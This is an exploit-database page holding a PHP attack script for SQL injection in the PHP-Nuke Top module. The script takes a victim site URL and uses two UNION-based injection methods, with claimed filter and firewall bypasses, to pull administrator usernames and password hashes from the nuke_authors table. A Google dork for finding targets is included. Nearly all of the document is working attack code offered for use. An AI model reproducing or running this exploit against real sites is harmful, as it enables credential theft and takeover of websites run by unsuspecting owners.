PHP-Nuke Top Module SQL Injection

2024.10.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: PHP-Nuke ( SQL injection Top Module + protection Bypass ) # Google Dork: intext: Powered by PHP-Nuke # Date: 2024-10-07 # Exploit Author: Emiliano Febbi # Vendor Homepage: https://phpnuke.org/ # Software Link: https://sourceforge.net/projects/phpnuke/files/phpnuke/ # Version: 6.x < 7.6 # Tested on: Windows 10 [code] ->New concept of exploit writing, CMS protections are useless. ->Very fast usage. <?php echo '<html><head><title>PHP-Nuke SQL injection / Bypass Protections</title></head><body><center> <body bgcolor="black"><body link="yellow"> <font color="white"> <pre>new exploit concept ###################################################################### #This exploit is for Top Module of PHP-Nuke 6.x < 7.6 # #auto-bypass *illegal operation* , *mod security* , *NukeSentinel* # #allowed http and https protocols. Code by Emiliano Febbi # ###################################################################### </pre><form action="'.$SERVER[PHP_SELF].'" method="POST"> <font color="red">~ insert victim site ~ </font>(*the folder must be specified)<br> <input type="text" name="victim" value="http://www.site.com"><br> <label for="dlt"><font color="white">++method++</font></label> <select name="exploit_nuke" id="lang"><option value="one">#1</option> <option value="two">#2</option></select><br><input type="submit" value="launch!"/><br> </form></font></body></html>'; if($_POST['victim']) { $site = $_POST['victim']; $j = $_POST['exploit_nuke']; switch ($j) { /*#method1*/ case "one": /*#Get info from victim site*/ if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a><br><br>"; else echo "<font color='yellow'>~missing Admin Login</font><br><br>"; if (false!==file("$site/modules.php?name=Top")) echo "<font color='yellow'>#Top Module Active!</font><br>"; else echo "<font color='yellow'>#Top Module not Active!</font><br>"; print '<font color="white">--------------------------------------<br></font>'; /*#Get user1*/ print "<font color='white'>#user1:<br><font color='lime'>"; $content_user=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--"); $comment_user=explode('<a href="modules.php?name=Surveys&amp;pollID=1">',$content_user); $comment_user=explode("</a>",$comment_user[1]); var_dump(strip_tags($comment_user[0])); echo "</font><br>"; /*#Get pwd1*/ print "#password1:<br><font color='red'>"; $content=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--"); $comment=explode('<a href="modules.php?name=Surveys&amp;pollID=1">',$content); $comment=explode("</a>",$comment[1]); var_dump(strip_tags($comment[0])); echo "</font><br>"; /*#Get user2*/ print "#user2:<br><font color='lime'>"; $content_user2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--"); $comment_user2=explode('<a href="modules.php?name=Surveys&amp;pollID=1">',$content_user2); $comment_user2=explode("</a>",$comment_user2[2]); var_dump(strip_tags($comment_user2[0])); echo "</font><br>"; /*#Get pwd2*/ print "#password2:<br><font color='red'>"; $content2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--"); $comment2=explode('<a href="modules.php?name=Surveys&amp;pollID=1">',$content2); $comment2=explode("</a>",$comment2[2]); var_dump(strip_tags($comment2[0])); echo "</font><br>"; break; /*###################################################################################################################################*/ case "two": /*#method2*/ /*#Get info from victim site*/ if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a><br><br>"; else echo "<font color='yellow'>~missing Admin Login</font><br><br>"; if (false!==file("$site/modules.php?name=Top")) echo "<font color='yellow'>#Top Module Active!</font><br>"; else echo "<font color='yellow'>#Top Module not Active!</font><br>"; print '<font color="white">--------------------------------------<br></font>'; /*#Get user1*/ print "<font color='white'>#user1:<br><font color='lime'>"; $content_userj=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--"); $comment_userj=explode('<a href="modules.php?name=Surveys&amp;pollID=0">',$content_userj); $comment_userj=explode("</a>",$comment_userj[1]); var_dump(strip_tags($comment_userj[0])); echo "</font><br>"; /*#Get pwd1*/ print "#password1:<br><font color='red'>"; $content_userp=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--"); $comment_userp=explode('<a href="modules.php?name=Surveys&amp;pollID=0">',$content_userp); $comment_userp=explode("</a>",$comment_userp[1]); var_dump(strip_tags($comment_userp[0])); echo "</font><br>"; /*#Get user2*/ print "#user2:<br><font color='lime'>"; $content_userz=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--"); $comment_userz=explode('<a href="modules.php?name=Surveys&amp;pollID=0">',$content_userz); $comment_userz=explode("</a>",$comment_userz[2]); var_dump(strip_tags($comment_userz[0])); echo "</font><br>"; /*#Get pwd2*/ print "#password2:<br><font color='red'>"; $content_userq=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--"); $comment_userq=explode('<a href="modules.php?name=Surveys&amp;pollID=0">',$content_userq); $comment_userq=explode("</a>",$comment_userq[2]); var_dump(strip_tags($comment_userq[0])); echo "</font><br>"; break; };; };;; ?> [/code]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top